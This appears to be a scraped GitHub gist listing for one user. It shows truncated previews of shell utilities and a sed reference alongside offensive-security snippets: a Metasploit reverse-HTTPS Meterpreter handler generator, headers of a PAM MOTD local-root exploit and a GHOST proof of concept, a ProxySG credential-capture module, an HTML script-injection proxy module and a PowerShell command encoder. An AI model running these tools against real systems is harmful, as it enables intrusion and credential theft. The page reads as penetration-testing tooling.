Gabe Marshall gabemarshall

@gabemarshall
gabemarshall / explain.sh
Last active August 29, 2015 14:05
Explainshell.com Bash Script (requires elinks)
#!/bin/bash
# If installing elinks via homebrew, install with `brew install elinks --devel`
MYURL="http://explainshell.com/explain?cmd="
count=0
for var in "$@"
do
#!/bin/bash
#
# Exploit Title: Ubuntu PAM MOTD local root
# Date: July 9, 2010
# Author: Anonymous
# Software Link: http://packages.ubuntu.com/
# Version: pam-1.1.0
# Tested on: Ubuntu 9.10 (Karmic Koala), Ubuntu 10.04 LTS (Lucid Lynx)
# CVE: CVE-2010-0832
# Patch Instructions: sudo aptitude -y update; sudo aptitude -y install libpam~n~i
gabemarshall / ghost.c
Created January 27, 2015 17:20
Ghost PoC binary
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#define CANARY "in_the_coal_mine"
struct {
char buffer[1024];

Keybase proof

I hereby claim:

  • I am gabemarshall on github.
  • I am tehskylark (https://keybase.io/tehskylark) on keybase.
  • I have a public key whose fingerprint is 154F E7AE 6BB1 3694 A23C DA7B A6E4 E466 86E5 5D54

To claim this, I am signing this object:

gabemarshall / AutoListener.rb
Last active August 29, 2015 14:20
Simple ruby script to generate a metasploit rc file
#!/usr/bin/ruby
def meterpit(lhost, lport)
options = "use multi/handler\n"
options += "set payload windows/meterpreter/reverse_https\n"
options += "set LHOST #{lhost}\nset LPORT #{lport}\n"
options += "set ExitOnSession false\n"
options += "set AutoRunScript post/windows/manage/smart_migration\n"
options += "exploit -j\n"
gabemarshall / http_proxysg.rb
Last active April 4, 2016 15:40
PoC for Bluecoat ProxySG Auth Challenge Vulnerability
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
# A fork of http ntlm capture module
# ProxySG SA97
# https://bto.bluecoat.com/security-advisory/sa93
##
require 'msf/core'
gabemarshall / tmux.sh
Created April 19, 2016 00:04
Sample script to start a tmux session with a vertically split window
#!/bin/bash
SESSION=$USER
tmux -2 new-session -d -s $SESSION
# Setup a window
tmux new-window -t $SESSION:1 -n 'The Internet'
# Split the window vertically
tmux split-window -v
class InjectJS < Proxy::Module
def on_request( request, response )
if response.content_type =~ /^text\/html.*/
if response.headers =~ /MSIE/
response.body.sub!( '</title>', "</title><script type='text/javascript'></script>" )
end
end
end
end
#!/usr/bin/env python
#
# Powerhell
#
# by Gabe Marshall
# base64 encodes command line argument to Windows PowerShell
#
# Heavily influenced by Carlos Perez's ps_encoder script (https://github.com/darkoperator/powershell_scripts/blob/master/ps_encoder.py)
import base64
# Reference: http://www.pement.org/sed/sed1line.txt
-------------------------------------------------------------------------
USEFUL ONE-LINE SCRIPTS FOR SED (Unix stream editor) Dec. 29, 2005
Compiled by Eric Pement - pemente[at]northpark[dot]edu version 5.5
Latest version of this file (in English) is usually at:
http://sed.sourceforge.net/sed1line.txt
http://www.pement.org/sed/sed1line.txt